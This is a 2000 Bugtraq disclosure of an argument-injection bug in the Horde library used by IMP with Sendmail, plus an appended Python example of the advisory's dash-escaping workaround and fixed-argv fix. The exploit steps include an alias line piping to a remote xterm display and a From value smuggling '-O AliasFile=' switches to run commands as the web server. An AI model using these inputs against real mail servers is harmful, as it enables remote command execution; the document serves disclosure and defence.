Date: Mon, 18 Sep 2000 18:56:14 +0200
From: "Steube, Jens" <Jens.Steube@COC-AG.DE>
Subject: Horde library Bug part 2
To: BUGTRAQ@SECURITYFOCUS.COM

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

* Horde Library $from Bug part 2
  + How to exploit with IMP and Sendmail *

Description:

The fix for the first detected problem with the $from variable in the Horde
library only escaped shell characters, which prevents direct command
execution. It is still possible to exploit the parsed $from line and execute
commands under the uid and gid of the web server.

Tested on: Debian 2.2 (potato); others not tested yet.

Release Date: 15/09/2000

Authors: Found, exploited and documented by Jens "atomi" Steube.
Fixed by Christian "thepoet" Winter.

Version: Horde v1.2.1
         IMP v2.2.1

The Exploit:

e.g.: Horde and IMP, as MTA we use Sendmail (v8.11.0)

0. The job is to send a mail to an address which is defined in an alias file
   which is manually added to Sendmail. This alias pipes to a command.
1. Log on to IMP and open a compose window.
2. Locally open a text editor and write a line in MTA alias file format. After
   that, save it locally.
   line e.g.: evil@localhost: "|/usr/X11R6/bin/xterm -display 192.168.4.8:0.0"
   (or any other command to be executed on the web server)
3. Upload the locally stored file as an attachment.
4. Open the HTML source code of the compose window and search for '/tmp'.
5. You will find the locally stored filename and path of the attachment on the
   web server. Copy it to the clipboard.
   Mind: that filename looks like /tmp/php??????.att
6. Just close the compose window!
7. Open a new compose window.
8. As your FROM line insert (including all quote types):
   line e.g.: <"x@x -O QueueDirectory=/tmp -O AliasFile=(insert Clipboard) -Fx">
9. As your TO line insert the user alias which you have defined in the uploaded
   attachment. e.g.: evil@localhost
10. Leave all other fields blank and send the mail.
11. Exploited.
Other MTAs:

The above exploit works with Sendmail in most configurations, but other MTAs
could also be exploited the same way. Notice that just disabling the AliasFile
flag is not enough to prevent attacks on this bug, because most MTAs also
provide other command switches to include external configuration.

Workaround:

The "$from" var has to be checked for "-" characters following a space
character. Passing those characters unfiltered will nearly always lead to
exploitable bugs or errors. As neither a mail address nor a name with a
leading minus sign makes sense, here is a small patch that converts every minus
at the beginning of a word into an underscore:

http://ssl.coc-ag.de/sec/index.htm#horde02

Fix:

The best solution would be to generally not pass variables to popen(), but
rather to open the pipe to Sendmail by calling
popen("$default->path_to_Sendmail -t") and put all available information into
the mail header. This requires some extra checking and converting, but secures
the system a lot.

Feedback:

Please send suggestions, updates, and comments to mailto:security@coc-ag.net
http://ssl.coc-ag.de/sec

Disclaimer:

The information within this document may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are NO
warranties with regard to this information. In no event shall the author be
liable for any consequences whatsoever arising out of or in connection with the
use or spread of this information. Any use of this information lies within the
user's responsibility.

References:

Both projects (Horde and IMP) of the Horde group can be found at
http://horde.org

Despite those few bugs, the people there have really done a great job on free
software.

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.8 for non-commercial use <http://www.pgp.com>

iQA/AwUBOcY5IP/VNLQKdxzWEQJK+QCg/wSA4/Dz7QgenFcLTig7ZjOlHxsAn2Zt
5WVavlN/5Z991giri/KOIl14
=eyOX
-----END PGP SIGNATURE-----
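The Workaround and Fix sections above describe two defences: neutralising a
leading "-" on every word of the $from value, and keeping user data out of the
popen() command line altogether by calling sendmail with a fixed "-t" argument
and passing addresses as mail headers. The following is an added example that
is not part of the advisory and not Horde's or IMP's own code; it is written in
Python rather than Horde's PHP so that the logic can be checked stand-alone.
SENDMAIL_PATH is an assumed path (Horde takes it from $default->path_to_Sendmail),
and all input values are constructed samples.

```python
import re
import subprocess
from typing import List, Tuple

# Assumed path; Horde itself takes it from $default->path_to_Sendmail.
SENDMAIL_PATH = "/usr/sbin/sendmail"

# Workaround from the advisory: a '-' that begins a whitespace-separated word
# of the $from value is turned into '_', so the MTA can never read it as an
# option switch. Dashes inside a word (e.g. "Jean-Luc") are left alone.
_LEADING_DASHES = re.compile(r"(?:^|(?<=\s))-+")


def neutralize_leading_dashes(from_value: str) -> str:
    """Replace every run of leading dashes of a word with underscores."""
    return _LEADING_DASHES.sub(lambda m: "_" * len(m.group(0)), from_value)


def is_safe_header_value(value: str) -> bool:
    """With 'sendmail -t' the MTA reads recipients from the headers, so a CR or
    LF inside a value would let a user smuggle in extra header lines (Bcc:).
    This is the 'extra checking' the advisory's Fix section asks for."""
    return "\r" not in value and "\n" not in value


def build_sendmail_call(from_addr: str, to_addrs: List[str],
                        subject: str, body: str) -> Tuple[List[str], bytes]:
    """Fix proposed by the advisory: argv is fixed (no user data in it) and all
    addressing goes into the message headers, which sendmail -t reads.
    -i keeps a lone '.' line in the body from terminating the input early.
    Returns argv and message so they can be inspected without a running MTA."""
    for value in [from_addr, subject, *to_addrs]:
        if not is_safe_header_value(value):
            raise ValueError("CR/LF in header value rejected: %r" % value)
    argv = [SENDMAIL_PATH, "-t", "-i"]
    headers = [
        "From: " + from_addr,
        "To: " + ", ".join(to_addrs),
        "Subject: " + subject,
    ]
    message = "\n".join(headers) + "\n\n" + body + "\n"
    return argv, message.encode("utf-8")


def send(from_addr: str, to_addrs: List[str], subject: str, body: str) -> None:
    argv, message = build_sendmail_call(from_addr, to_addrs, subject, body)
    # No shell is involved: the list form of subprocess.run execs sendmail
    # directly, so nothing in the message can ever become an argument.
    subprocess.run(argv, input=message, check=True)


if __name__ == "__main__":
    # Constructed sample: an option-looking From value in the style of the
    # advisory. As header data it is inert; only in argv was it dangerous.
    hostile_from = "x@x -O QueueDirectory=/tmp -Fx"
    print(neutralize_leading_dashes(hostile_from))
    argv, msg = build_sendmail_call(hostile_from, ["user@example.com"],
                                    "test", "hello")
    print(argv)
    print(msg.decode())
```

The first function is the advisory's workaround and only makes sense while
$from is still interpolated into a command line. The second approach is the
advisory's preferred fix: with a fixed argv the switch parser never sees user
input, and the remaining risk moves to the header layer, which is why the CR/LF
check is mandatory once "-t" decides the recipients.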